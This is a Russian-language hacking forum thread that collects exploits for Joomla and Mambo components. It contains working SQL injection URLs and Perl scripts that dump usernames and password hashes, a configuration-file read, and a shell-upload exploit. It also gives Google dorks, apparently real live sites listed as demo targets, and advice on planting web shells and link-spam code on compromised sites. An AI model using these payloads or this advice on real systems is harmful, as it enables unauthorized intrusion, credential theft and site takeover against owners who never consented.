Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Joomla "com_jomtube" component SQL Injection

    Уязвим параметр user_id
    Эксплyатация:
    Code:
    index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube
    user_id - должен быть существующий!

    POC:
    Дорк: "inurl:com_jomtube"


    Уязвимый код:
    components/com_jomtube/models/video.php
    Пару моментов, все приводить не буду:

    P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.
    http://www.exploit-db.com/exploits/14434/
     
    _________________________
    3 people like this.
    1. Zed0x

      Zed0x Member

      Joined:
      4 Jun 2012
      Messages:
      114
      Likes Received:
      29
      Reputations:
      23
      Joomla tag Remote Sql Exploit
      dork: inurl:index.php?option=com_tag


      PHP:
      #!/usr/bin/perl -w
      print "\t\t\n\n";
      print 
      "\t\n";
      print 
      "\t                                                   \n";
      print 
      "\t      Joomla com_tag Remote Sql Exploit \n";
      print 
      "\t\n\n";
      use 
      LWP::UserAgent;
      print 
      "\nExample:[http://wwww.site.com/]: ";
      chomp(my $target=<STDIN>);
      $user="username";
      $pass="password";
      $table="jos_users";
      $d4n="com_tag&task";
      $b LWP::UserAgent->new() or die "Could not initialize browser\n";
      $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
      $host $target ."index.php?option=".$d4n."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
      $res $b->request(HTTP::Request->new(GET=>$host));
      $answer $res->content;
      if (
      $answer =~ /<user>(.*?)<user>/){
      print 
      "\nLos Information for site:\n";
      print 
      "\n
      * Admin User : $1"
      ;
      }
      if (
      $answer =~/<pass>(.*?)<pass>/){print "\n
      * Admin Hash : $1\n\n"
      ;
      print 
      "\t\t#   Exploit finished   #\n\n";}
      else{print 
      "\n[-] Exploit Failed...\n";}
       
      1 person likes this.
      1. winstrool

        winstrool ~~*MasterBlind*~~

        Joined:
        6 Mar 2007
        Messages:
        1,414
        Likes Received:
        911
        Reputations:
        863
        Joomla "com_commedia" component SQL Injection

        Уязвим параметр id
        Эксплyатация:
        Code:
        index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
        POC:
        Дорк: "inurl:com_commedia id"


        Уязвимый код:
        components/com_commedia/models/file.php

        P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
         
        _________________________
        #263 winstrool, 14 Nov 2012
        Last edited: 14 Nov 2012
        1 person likes this.
        1. KolosJey

          KolosJey Member

          Joined:
          21 Dec 2009
          Messages:
          45
          Likes Received:
          42
          Reputations:
          48
          Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.

          Как там у хакеров? 0day pRiv8 :D

          index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e66696775726174696f6e2e706870,2--+
           
          1. winstrool

            winstrool ~~*MasterBlind*~~

            Joined:
            6 Mar 2007
            Messages:
            1,414
            Likes Received:
            911
            Reputations:
            863
            Моя цель была раскрыть сам уязвимый код, а не копипаст! на счет чтения файлов я тоже видел, но еще пока не проверил...
             
            _________________________
            1. alerondel

              alerondel Member

              Joined:
              20 Apr 2011
              Messages:
              165
              Likes Received:
              9
              Reputations:
              6
              Joomla "com_conference" SQL Injection

              Уязвим параметр ID

              Эксплуатация:
              Code:
              /index.php?option=com_conference&task=show&id=999999.9 /*!UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536*/--
               
              1. Zed0x

                Zed0x Member

                Joined:
                4 Jun 2012
                Messages:
                114
                Likes Received:
                29
                Reputations:
                23
                Сканер joomla сайта​


                Появился новый проект - c0lips.ru, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.

                Для актуализации проекта, прошу добавлять свои уязвимости по адресу: тык
                 
                2 people like this.
                1. grimnir

                  grimnir Members of Antichat

                  Joined:
                  23 Apr 2012
                  Messages:
                  1,114
                  Likes Received:
                  830
                  Reputations:
                  231
                  Joomla All v1.5 Error Based SQL Injection Vulnerability

                  Joomla Component com_user

                  ####
                  # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
                  # Author: Caddy-Dz
                  # Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
                  # E-mail: [email protected]
                  # Category:: webapps
                  # script home : http://joomla.com
                  # Dork : inurl:eek:ption=com_user
                  # Security Risk: critical
                  # Tested on: Back|Track 5 KDE / French
                  ####
                  # this was written for educational purpose only. use it at your own risk.
                  # author will be not responsible for any damage caused! user assumes all responsibility
                  # intended for authorized web application pentesting only!

                  // Description :

                  the affected component is /com_user/ in all joomla v1.5
                  P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :)

                  // Exploit :

                  http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
                  http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]

                  # priv8 youtube link, just people who has the link could view :
                  http://www.youtube.com/watch?v=g0QcjxIb68I

                  // Demo :

                  http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
                  http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
                  http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
                  http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
                  http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
                  http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='


                  # Greets To : ==============================================================================
                  # The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
                  # D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
                  # ... And All Algerian Hax0rs
                  ============================================================================================

                  # 1337day.com [2012-12-12][/quote]
                   
                  _________________________
                  #268 grimnir, 20 Dec 2012
                  Last edited by a moderator: 21 Dec 2012
                  1. po[w]er

                    po[w]er Banned

                    Joined:
                    1 Oct 2012
                    Messages:
                    57
                    Likes Received:
                    0
                    Reputations:
                    0
                    отличный
                     
                    1. iskus

                      iskus New Member

                      Joined:
                      14 Oct 2012
                      Messages:
                      1
                      Likes Received:
                      0
                      Reputations:
                      0
                      TinyMCE TinyBrowser addon multiple vulnerabilities

                      Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти Restricted access

                      http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities

                      Спасибо за помощь.
                       
                      1. Zed0x

                        Zed0x Member

                        Joined:
                        4 Jun 2012
                        Messages:
                        114
                        Likes Received:
                        29
                        Reputations:
                        23
                        Данная бага актуальна для joomla 1.5.12, которая сейчас практически не встречается и как вы ее собрались использовать я не понимаю.
                        В joomla заливайте шелл через модули/шаблоны, собственно как и в других CMS...
                         
                        1. xaknem

                          xaknem New Member

                          Joined:
                          12 Feb 2008
                          Messages:
                          0
                          Likes Received:
                          0
                          Reputations:
                          0
                          Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?

                          Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
                          На модули выставлены права разрешающие редактирование


                          Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)

                          Заранее благодарен
                           
                          1. winstrool

                            winstrool ~~*MasterBlind*~~

                            Joined:
                            6 Mar 2007
                            Messages:
                            1,414
                            Likes Received:
                            911
                            Reputations:
                            863
                            Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
                             
                            _________________________
                            1. xaknem

                              xaknem New Member

                              Joined:
                              12 Feb 2008
                              Messages:
                              0
                              Likes Received:
                              0
                              Reputations:
                              0
                              права на правку только в одном файле который лежит в папке с шаблоном, могу редактировать только его

                              еще права на редактирование на папки модулей
                               
                              1. winstrool

                                winstrool ~~*MasterBlind*~~

                                Joined:
                                6 Mar 2007
                                Messages:
                                1,414
                                Likes Received:
                                911
                                Reputations:
                                863
                                PHP-iclude: com_jomholiday
                                залиться пока не получилось, как зальюсь приведу пример уязвимого кода.
                                 
                                _________________________
                                4 people like this.
                                1. infoseller

                                  infoseller Member

                                  Joined:
                                  17 Aug 2011
                                  Messages:
                                  136
                                  Likes Received:
                                  13
                                  Reputations:
                                  0
                                  Code:
                                  # Exploit Title:Joomla com_collecter shell upload 
                                  # Author: Red Dragon_al (Alb0zZ Team) 
                                  # Home :HackForums.AL,alb0zz.in 
                                  # Date :19/01/2013   
                                  # Category:: web apps 
                                  # Google dork: [inurl:index.php?option=com_collector] 
                                  # Tested on: Windows XP   
                                  # Download: http://www.steevo.fr/en/download 
                                  # Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
                                  # ---------------------------------------   
                                  1- Google dork: [inurl:index.php?option=com_collector]   
                                  2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
                                  3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
                                  # Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013
                                  http://www.exploit-db.com/exploits/24228/
                                   
                                  1. winstrool

                                    winstrool ~~*MasterBlind*~~

                                    Joined:
                                    6 Mar 2007
                                    Messages:
                                    1,414
                                    Likes Received:
                                    911
                                    Reputations:
                                    863
                                    P.S: копировать не стоит сплоиты с других ресурсов, если копи пастите, то лудше с раскрытием уязвимого года не болие...
                                     
                                    _________________________
                                    1. uCryNet

                                      uCryNet Member

                                      Joined:
                                      11 Mar 2012
                                      Messages:
                                      53
                                      Likes Received:
                                      13
                                      Reputations:
                                      5
                                      exploit [joomla]


                                      Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
                                      3xpl01t c0d3 :

                                      Code:
                                      Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
                                      author : *devil-zone.net
                                      greet is to : devil-zone.net *all members 
                                      vel = sqlI 
                                      S1mPl3 P3rL 3xpl01t3r

                                      Code:
                                      #!/usr/bin/perl
                                      #greet is to Evil-Dz
                                      system("clear");
                                      print "***************************************\n";
                                      print " * * * * Good Luck & Hafe Fun * * * * *\n";
                                      print " * * * Coded by devil-zone forum * * **\n"; 
                                      print "***************************************\n\n";
                                      use LWP::UserAgent;
                                      print "Target page [ex: HosT] --> ";
                                      chomp(my $target=<STDIN> );
                                      $column_name="concat(username,0x3a,password,0x3a,mail)";
                                      $table_name="jos_users";
                                      $prm="-1/**/union/**/select/**/";
                                      $start= LWP::UserAgent->new() or die "[!] Error while processing";
                                      $start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
                                      $website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
                                      $ok= $start->request(HTTP::Request->new(GET=>$website));
                                      $ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
                                      print "[+] Password found --> $1\n\n";
                                      sleep 1;
                                      }
                                      else
                                      {
                                      print "No password found :(\n";
                                      } 
                                       
                                      1. rik

                                        rik New Member

                                        Joined:
                                        9 Aug 2012
                                        Messages:
                                        1
                                        Likes Received:
                                        0
                                        Reputations:
                                        0
                                        подскажите пожалуйста, как туда залить шелл? выбрать файл, даёт. а кнопка на загрузку не активна.
                                         
                                        1. dmg

                                          dmg Member

                                          Joined:
                                          31 Oct 2011
                                          Messages:
                                          153
                                          Likes Received:
                                          12
                                          Reputations:
                                          0
                                          Подскажите пожалуйста, это какая версия джумлы: $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ ?